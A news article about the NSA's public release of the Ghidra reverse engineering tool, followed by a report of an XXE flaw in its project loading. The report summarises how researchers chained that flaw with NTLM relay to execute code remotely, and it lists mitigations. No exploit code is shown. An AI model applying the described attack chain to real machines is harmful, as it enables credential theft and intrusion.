NSA releases Ghidra, a free software reverse engineering toolkit - Critical vulnerability in the NSA Ghidra tool

At the RSA security conference today, the National Security Agency, released Ghidra, a free software reverse engineering tool that the agency had been using internally for well over a decade.The tool is ideal for software engineers, but will be especially useful for malware analysts first and foremost.The NSA's general plan was to release Ghidra so security researchers can get used to working with it before applying for positions at the NSA or other government intelligence agencies with which the NSA has previously shared Ghidra in private.Ghidra is currently available for download only through its official website, but the NSA also plans to release its source code under an open source license on GitHub in the coming future. News that the NSA was going to release Ghidra first broke at the start of the year, and the tool has been on everybody's mind for the past two months. The reason is that Ghidra is a free alternative to IDA Pro, a similar reverse engineering tool that's only available under a very expensive commercial license, priced in the range of thousands of US dollars per year. Being offered for free, most experts expect Ghidra to snap up a big portion of the reverse engineering tools market share within weeks, especially since early user reviews are almost all entirely positive.

As for its technical features, Ghidra is coded in Java, has a graphical user interface (GUI), and works on Windows, Mac, and Linux.According to Rob Joyce, Senior Advisor at the National Security Agency and the NSA official who announced the tool's release today at the RSA conference, Ghidra can analyze binaries written for a wide variety of architectures, and can be easily extended with more, if ever needed. Installing Ghidra is as simple as unpacking a ZIP archive. The only requirement is a version of the Java Development Kit 11 or later that's needed to run the app's GUI. More on the tool's installation routine from the tool's official docs: Besides an installation guide, Ghidra's docs also come with classes and exercises for beginners, intermediates, and advanced levels that will help users get used to the tool's GUI, which is very different from any similar tools. You're a IDA Pro power user? No problem, there's a guide for that too. Need a keyboard shortcut cheatsheet? No problem, there's one hosted online, here. Don't like the bright GUI? No problem, there's a dark mode included in Ghidra's settings section. At the time of this article --an hour after the tool's release-- the reaction from the infosec (information security) community has been almost entirely positive, with glowing reviews from some of the biggest names in the cyber-security industry.

Ghidra may not be the IDA Pro killer most experts expected, since IDA Pro still offers a debugger component not present in Ghidra, but things are looking up.Because Ghidra's code will be open-sourced, this also means it will be open to community contributions, and many expect it to receive a debugger in the coming future and allow malware analysts to jump ship and stop paying a fortune for IDA licenses.And the infosec community has already started contributing back to Ghidra, even if the tool's source code hasn't been published on GitHub just yet.Just minutes after the tool's release, Matthew Hickey, co-founder and director of UK-based cyber-security firm Hacker House, reported the first security issue in the NSA's tool, which apprently runs a server component that listens to commands it receives from the internet. Fixing it should be a one-line change, though, according to Hickey, and the issue only affects users when they run Ghidra in its "debug mode," rather than its normal mode.

"By open-sourcing GHIDRA, the NSA will benefit from a diverse user base whose feedback will make the tool even more effective, For underprivileged cyber teams grappling with a lack of personnel or resources, the free tool is a game changer to easing the barrier of entry into the cyber workforce and raising the proficiency of these teams. As a user of this tool for years, I cannot wait to see how it improves in the hands of my peers," Patrick Miller, security researcher at Raytheon Intelligence, Information and Services told ZDNet via email. The news of the NSA open-sourcing one of its internal tools should not be a surprise anymore. The NSA has open-sourced all sorts of tools over the past few years, with the most successful of them being Apache NiFi, a project for automating large data transfers between web apps, and which has become a favorite on the cloud computing scene. In total, the NSA has open-sourced 32 projects as part of its Technology Transfer Program (TTP) so far and has most recently even opened an official GitHub account.Ghidra has already been made available as a package for Arch Linux, an operating system preferred by most white, gray, and black-hat hackers.



Experts found an XML external entity (XXE) vulnerability that could be exploited by attackers that are able to trick a user into opening or restoring a specially crafted project. The issue impacts the project open/restore processes, to reproduce it, the user needs to create a project, close it, and put an XXE payload in any of the XML files in the project directory. Once the project is opened again, the payload will be executed. “Project open/restore is susceptible to XML External Entity Expansion attacks. This can be exploited in various ways by getting someone to open/restore a project prepared by attacker.” reads the description published in a report on GitHub.

Experts from Tencent Security also published an analysis that reveals how it is possible to exploit the XXE flaw to remotely execute code on the victim’s machine. “Based on our prior research on XXE vulnerability exploitation, we found that attackers can abuse Java features and weaknesses in NTLM protocol in Windows operating system to achieve remote code execution,” reads the analysis. The experts demonstrated that an attacker could exploit the issue by setting up an HTTP Server with NTLM authentication, then use an XXE/SSRF vulnerability to force a NTLM authentication from the victim.

“It worth noticing that the NTLM has two versions, NTLMv1 and NTLMv2. When authenticating with NTLMv1, attacker can directly relay the Net-NTLM Hash to the victim’s SMB service. In the SMBv2 case, attacker must first modify the Negotiate Flags in the Type 2 Message to unset Negotiate Always Sign and Negotiate 0x00004000 flags.” continues the analysis. “This transforms it from local authentication to network authentication, and also strips the signature.”

The researchers published proof-of-concept code to exploit the XXE in Ghidra suite. “When victim uses Ghidra to open this malicious project, attacker can obtain NTLM Hash from the victim’s machine, therefore execute arbitrary command on victim’s machine,” the researchers concludes. Experts suggest mitigating the issue by configuring Windows firewall to block incoming SMB requests, enable SMB Sign if SMB server is required, and upgrade to the latest version of JDK. The XXE vulnerability has been addressed with the release of Ghidra version 9.0.1 that will be available very soon.

The framework was first mentioned in the CIA Vault 7 dump that was leaked in 2017. WikiLeaks obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking techniques, tools, and capabilities. Digging in the huge trove of files, it is possible to find also information about the GHIDRA, a Java-based engineering tool.


No comments :